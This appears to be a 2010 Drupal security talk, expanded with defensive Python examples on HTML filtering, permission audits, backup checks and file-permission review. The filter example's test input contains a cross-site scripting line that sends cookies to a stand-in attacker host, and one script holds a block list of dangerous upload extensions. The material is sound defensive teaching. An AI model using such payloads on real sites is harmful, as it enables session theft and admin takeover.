This document discusses Drupal security best practices. It introduces the presenters and defines common security threats like cross-site scripting. It demonstrates how malicious javascript could hijack an admin account. Charts show the most common vulnerabilities and input formats are discussed as a way to control user input. The document stresses keeping software updated, using backups, and following secure development practices.
Drupal security - Configuration and process
1. Drupal Security
Gábor Hojtsy & Ben Jeavons
24. aug 14:45
VPS.net
Tuesday, August 31, 2010
2. Who we are
• Gábor Hojtsy: Drupal 6 co-maintainer, Acquia, Security Team Member
• Ben Jeavons: Drupal Security Report, Growing Venture Solutions, Security Team Member
3. Web security
• Protecting resources from abuse
• Protecting data
• Protecting available actions
• Attackers exploit a weakness to do harm
4. Demo
• Malicious Javascript is entered
• Admin unknowingly executes
• Javascript alters admin-only settings
• Changes admin password
• Puts site offline
5. 66%
likelihood that a website has Cross Site Scripting
http://whitehatsec.com/home/assets/presentations/09PPT/PPT_statsfall09_8th.pdf
7. Lots of risks
• Prioritize your actions
• Secure configuration
• Careful processes
• Keep code up-to-date
• Audit custom code
8. Smart configuration
• Control user input
• Input formats
• Trust
• Roles and permissions
9. Input formats
• Input formats control what happens when user-supplied data is displayed
10. Input formats
• Filtered HTML for untrusted roles
• Full HTML for completely trusted roles
11. Filtered HTML
• HTML filter
• Limits the allowed tags
12. Unsafe HTML tags
• Script tags, or any tag that accepts JS event handler attributes (onclick, onerror, ...)
  • <script>
• Any tag that makes the viewer’s browser request a URL
  • <img>
13. No image tags?!
• An <img> makes every viewer’s browser request the URL in src: CSRF against any action that runs on a plain GET
• It’s a matter of trust
• Let trusted users attach images through CCK & imagefield instead of <img> in body text
• Control access to Full HTML
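To make slides 11 to 13 concrete, here is an added example (not Drupal's own filter_xss() code) of an allowlist filter that behaves like a Filtered HTML format next to a Full HTML format that passes text through untouched. The tag list is Drupal 6's default; the attribute allowlist, the URL-scheme check and the sample post are assumptions made for this example.

```python
"""Allowlist HTML filter in the spirit of Drupal 6's "Filtered HTML" input format.

Added example; this is not Drupal's own filter code (that is filter_xss() in
PHP).  The tag allowlist copies Drupal 6's default "Allowed HTML tags" setting;
the attribute and URL-scheme allowlists and the sample input are assumptions
constructed for this example.
"""
from html import escape
from html.parser import HTMLParser

# Drupal 6 default allowed tags for Filtered HTML: no <script>, no <img>.
FILTERED_HTML_TAGS = frozenset(
    ["a", "em", "strong", "cite", "code", "ul", "ol", "li", "dl", "dt", "dd"])
# Attributes kept per tag (assumed). Every on* handler is dropped regardless.
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Schemes a kept href may use; javascript:, data:, vbscript: and so on are refused.
SAFE_SCHEMES = {"http", "https", "mailto"}

INPUT_FORMATS = {
    "filtered_html": FILTERED_HTML_TAGS,  # for untrusted roles
    "full_html": None,                    # for completely trusted roles: no filtering
}


def safe_url(url):
    """True for relative URLs and absolute URLs with an allowlisted scheme.

    Whitespace and control characters are removed first, because browsers
    ignore them and "java\\tscript:" would otherwise slip past a naive check.
    """
    cleaned = "".join(c for c in (url or "") if c.isprintable() and not c.isspace())
    head = cleaned.lower().split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True
    return head.split(":", 1)[0] in SAFE_SCHEMES


class AllowlistFilter(HTMLParser):
    """Rebuilds the document keeping only allowlisted tags and attributes."""

    def __init__(self, allowed_tags):
        super().__init__(convert_charrefs=True)
        self.allowed_tags = allowed_tags
        self.out = []
        self.dropped = []      # tags removed, for logging/auditing
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._in_script = True   # also discard the element's contents
        if tag not in self.allowed_tags:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):          # onclick, onerror, onload, ...
                continue
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._in_script = False
        if tag in self.allowed_tags:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._in_script:
            self.out.append(escape(data, quote=False))


def render(text, input_format):
    """Apply the named input format; returns (html, dropped_tags)."""
    allowed = INPUT_FORMATS[input_format]
    if allowed is None:
        return text, []     # Full HTML: whatever the author typed runs as-is
    parser = AllowlistFilter(allowed)
    parser.feed(text)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample of what an untrusted user might post (not a payload from
# the talk): inline script, event handler, javascript: link, tracking image.
SAMPLE = ('<p>Hi <strong>admin</strong>, <a href="javascript:alert(1)" onclick="steal()">click</a> '
          '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
          '<img src="http://attacker.example/track.gif"></p>')

if __name__ == "__main__":
    for fmt in INPUT_FORMATS:
        html, dropped = render(SAMPLE, fmt)
        print(fmt, "->", html, "| dropped:", dropped)
```

Note what the Filtered HTML path does with the sample: the <script> element and its body vanish, the onclick handler and the javascript: href are dropped from the otherwise allowed <a>, and <img> goes because it is not on the list. The Full HTML path returns the same string untouched, which is why that format belongs only to completely trusted roles.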
14. Trust
• Know your roles
• Which users have which roles
• How roles are granted
15. “Super-admin” permissions
• Administer permissions
• Administer users
• Administer filters
• Administer content types
• Administer site configuration
16. Trust
• Utilize principle of Least Privilege
• Grant only the necessary permissions to carry out the required work
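As an added example (not the Drupal Security Review module's own code), the following script audits which roles and users hold the super-admin permissions listed on slide 15 and applies the least-privilege fix from slide 16. The five permission strings are Drupal 6's; the roles, users and their assignments are constructed for the example.

```python
"""Audit Drupal 6 roles for "super-admin" permissions and enforce least privilege.

Added example, not the Drupal Security Review module's own code.  The five
permission names are the ones the slides list and are real Drupal 6 permission
strings; the role and user data below is constructed for this example, not a
dump from a live site.
"""

# Any role holding one of these can take over the site: with "administer
# filters" alone a user can give their own role Full HTML (or the PHP filter)
# and then run the attack from the demo slide.
SUPER_ADMIN_PERMISSIONS = frozenset([
    "administer permissions",
    "administer users",
    "administer filters",
    "administer content types",
    "administer site configuration",
])

# Constructed stand-in for the {permission} table: role name -> permissions.
ROLE_PERMISSIONS = {
    "anonymous user": {"access content"},
    "authenticated user": {"access content", "access comments", "post comments"},
    # "administer filters" crept in here so editors could tweak the HTML filter.
    "editor": {"access content", "create story content", "edit any story content",
               "administer filters"},
    "administrator": {"access content", "administer nodes"} | set(SUPER_ADMIN_PERMISSIONS),
}

# Constructed stand-in for the {users_roles} table: user -> roles.
USER_ROLES = {
    "alice": {"authenticated user", "administrator"},
    "bob": {"authenticated user", "editor"},
    "mallory": {"authenticated user"},
}


def super_admin_grants(role_permissions, trusted_roles=("administrator",)):
    """Roles outside the trusted set that hold a super-admin permission."""
    findings = {}
    for role, perms in role_permissions.items():
        if role in trusted_roles:
            continue
        risky = perms & SUPER_ADMIN_PERMISSIONS
        if risky:
            findings[role] = sorted(risky)
    return findings


def effective_permissions(user, user_roles, role_permissions):
    """Union of the permissions of every role the user holds."""
    perms = set()
    for role in user_roles.get(user, ()):
        perms |= role_permissions.get(role, set())
    return perms


def super_admin_users(user_roles, role_permissions):
    """Users who, through any role, can act as site administrator."""
    return sorted(
        user for user in user_roles
        if effective_permissions(user, user_roles, role_permissions) & SUPER_ADMIN_PERMISSIONS
    )


def revoke(role_permissions, role, permission):
    """Least-privilege fix: return a copy with one permission removed from a role."""
    fixed = {r: set(p) for r, p in role_permissions.items()}
    fixed[role].discard(permission)
    return fixed


if __name__ == "__main__":
    print("risky grants:", super_admin_grants(ROLE_PERMISSIONS))               # {'editor': ['administer filters']}
    print("super-admin users:", super_admin_users(USER_ROLES, ROLE_PERMISSIONS))  # ['alice', 'bob']
    fixed = revoke(ROLE_PERMISSIONS, "editor", "administer filters")
    print("after revoke:", super_admin_users(USER_ROLES, fixed))              # ['alice']
```

The point of the user-level view is that "who is trusted" is a property of users, not of role names: bob never had the administrator role, yet until the revoke he could have taken over the site through the editor role's one stray permission.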
18. Recovering from attack
• Restore from backup
• Upgrade to latest security releases
• Change your passwords
• Audit your configuration & custom code
19. Backups
• You do have backups, don’t you?
• phpMyAdmin > Export
• mysqldump on the command line
• Be sure to check they worked!
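An added example of the "check they worked" step (not from the talk): a checker for a mysqldump file that catches the usual failure modes, namely an empty file, an error message saved instead of a dump, a schema-only export, and a dump cut off before the end. The mysqldump command in the docstring and the required-table list are assumptions; the sample dumps are constructed.

```python
"""Sanity-check a mysqldump backup of a Drupal database before trusting it.

Added example; the talk only says "be sure to check they worked".  It assumes
the dump was produced with something like
    mysqldump --single-transaction -u drupal -p drupal > drupal-$(date +%F).sql
and that the tables in REQUIRED_TABLES exist on the site (users, node and
system are core Drupal 6 tables; extend the tuple for your own).  The sample
dumps below are constructed, heavily shortened imitations of mysqldump output.
"""
import gzip
import os
import re
import tempfile

REQUIRED_TABLES = ("users", "node", "system")

CREATE_RE = re.compile(r"^CREATE TABLE `?(\w+)`?", re.M)
INSERT_RE = re.compile(r"^INSERT INTO `?(\w+)`?", re.M)


def check_dump(dump_text, required_tables=REQUIRED_TABLES):
    """Return a list of problems; an empty list means the dump looks usable."""
    problems = []
    if not dump_text.strip():
        return ["dump is empty"]
    if not dump_text.lstrip().startswith("-- MySQL dump"):
        problems.append("missing mysqldump header (wrong file or an error message?)")
    created = set(CREATE_RE.findall(dump_text))
    with_rows = set(INSERT_RE.findall(dump_text))
    for table in required_tables:
        if table not in created:
            problems.append("table %s missing" % table)
        elif table not in with_rows:
            problems.append("table %s has schema but no rows (--no-data?)" % table)
    # mysqldump writes this as the very last line; without it the dump was cut
    # short (disk full, connection dropped, phpMyAdmin timeout).
    last_line = dump_text.rstrip().splitlines()[-1]
    if not last_line.startswith("-- Dump completed"):
        problems.append("no 'Dump completed' marker at end of file")
    return problems


def check_dump_file(path, required_tables=REQUIRED_TABLES):
    """Same check against a file on disk; .gz dumps are read transparently."""
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
        return check_dump(fh.read(), required_tables)


def roundtrip_gz(dump_text):
    """Write the dump gzipped to a temp file and check it from disk."""
    with tempfile.NamedTemporaryFile(suffix=".sql.gz", delete=False) as tmp:
        path = tmp.name
    with gzip.open(path, "wt", encoding="utf-8") as fh:
        fh.write(dump_text)
    try:
        return check_dump_file(path)
    finally:
        os.remove(path)


# Constructed, shortened imitation of mysqldump output (not a real dump).
GOOD_DUMP = """-- MySQL dump 10.13  Distrib 5.1.49, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: drupal
-- ------------------------------------------------------
DROP TABLE IF EXISTS `node`;
CREATE TABLE `node` (
  `nid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  PRIMARY KEY (`nid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `node` VALUES (1),(2);
DROP TABLE IF EXISTS `system`;
CREATE TABLE `system` (
  `filename` varchar(255) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `system` VALUES ('modules/node/node.module');
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `uid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  PRIMARY KEY (`uid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `users` VALUES (0),(1);
-- Dump completed on 2010-08-31 14:45:00
"""

# The same dump cut off part-way: what you get when the export died.
TRUNCATED_DUMP = GOOD_DUMP.split("DROP TABLE IF EXISTS `users`")[0]

if __name__ == "__main__":
    print("good:", check_dump(GOOD_DUMP))
    print("truncated:", check_dump(TRUNCATED_DUMP))
    print("gzipped good:", roundtrip_gz(GOOD_DUMP))
```

A cron job that runs check_dump_file over last night's file and mails a non-empty result is the cheapest way to notice a broken backup before you need it rather than after; the truncated case is the one that silently passes a "file exists and is not empty" check.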
20. Open source is secure
• Source code is open for people to look at
• Popularity means eyes on code
• Collaboration increases code quality
21. Drupal is secure
• Drupal APIs are designed to be secure
• http://drupal.org/writing-secure-code
22. Drupal security team
• Team of volunteers
• Support core and all(!) of contrib
• Not actively reviewing all contrib projects
23. Security Advisories
• Only stable project releases
• SAs on Wednesdays
• New core release types
• Bug fix release / Security fix release
24. Stay up-to-date
• Know about security updates
• Security Advisories
• Update status module
• Mailing list, RSS, Twitter
• Apply them!
25. Security updates
• Most security updates are small
• But not always
• Apply updates to development instance
• Test, then apply to production
26. FTP
• Do not use it!
• Common vector for attack
• Really, we’ve moved past plain-text
27. SFTP
• “Secure” FTP: file transfer over SSH, not FTP at all
• Your host should provide it
• If not, consider a new one
28. SSL
• Run Drupal on full SSL
• Use securepages and
securepages_prevent_hijack modules
• http://crackingdrupal.com/blog/greggles/drupal-and-ssl-multiple-recipes-possible-solutions-https
• Use a valid certificate
29. Security Review
• http://drupal.org/project/security_review
• File system permissions
• Granted “super-admin” permissions
• Input formats
• Allowed upload extensions
• PHP & Javascript in content
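Two of the checks on this slide, file system permissions and allowed upload extensions, as an added stand-alone example (not the security_review module's code). It assumes a Drupal 6 layout with sites/default/files as the only path the web server should be able to write to, uses an assumed list of upload extensions that execute on the server or run script in the browser, and builds a constructed sample tree in a temp directory.

```python
"""Two of the Security Review module's checks, reimplemented as a stand-alone script.

Added example, not the security_review module's own code.  It assumes a
Drupal 6 layout with the public files directory at sites/default/files (the
one place the web server legitimately needs write access) and uses an assumed
list of upload extensions that let a file execute or run script in the
browser; the sample tree built below is constructed in a temp directory.
"""
import os
import stat
import tempfile

# Extensions that should never appear in the upload module's allowed list
# (assumed set; the module's own list may differ).
DANGEROUS_UPLOAD_EXTENSIONS = frozenset([
    "php", "phtml", "php3", "php4", "php5", "phps", "pl", "py", "cgi",
    "asp", "js", "htm", "html", "exe", "sh",
])

# Paths under the Drupal root that are expected to be web-server writable.
WRITABLE_ALLOWED = ("sites/default/files",)


def unsafe_upload_extensions(allowed_setting):
    """Flag entries of Drupal's space-separated 'allowed extensions' setting."""
    wanted = set(allowed_setting.lower().split())
    return sorted(wanted & DANGEROUS_UPLOAD_EXTENSIONS)


def world_writable_paths(root, allowed=WRITABLE_ALLOWED):
    """Relative paths under root that anyone on the host can modify.

    Web-writable code lets an attacker with any foothold (a weak FTP account,
    another vhost on the same box) drop a PHP shell or edit settings.php.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(rel == a or rel.startswith(a + "/") for a in allowed):
                continue
            if os.lstat(full).st_mode & stat.S_IWOTH:
                findings.append(rel)
    return sorted(findings)


def build_sample_tree():
    """Constructed Drupal-like tree with one bad permission; returns its root."""
    root = tempfile.mkdtemp(prefix="drupal-")
    for d in ("sites", "sites/default", "sites/default/files"):
        path = os.path.join(root, d)
        os.makedirs(path, exist_ok=True)
        os.chmod(path, 0o755)   # explicit, so the result does not depend on umask
    layout = {
        "index.php": 0o644,
        "sites/default/settings.php": 0o666,      # the mistake we want to catch
        "sites/default/files/upload.txt": 0o666,  # fine: files dir is meant to be writable
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("x")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("world-writable outside files/:", world_writable_paths(root))
    # Drupal 6's default upload extension list, plus two that should not be there.
    print("unsafe extensions:", unsafe_upload_extensions("jpg jpeg gif png txt doc xls pdf php html"))
```

Run world_writable_paths against the real Drupal root (the directory holding index.php); anything it reports outside the files directory is a finding, and settings.php in particular should be read-only for everyone once installation is done.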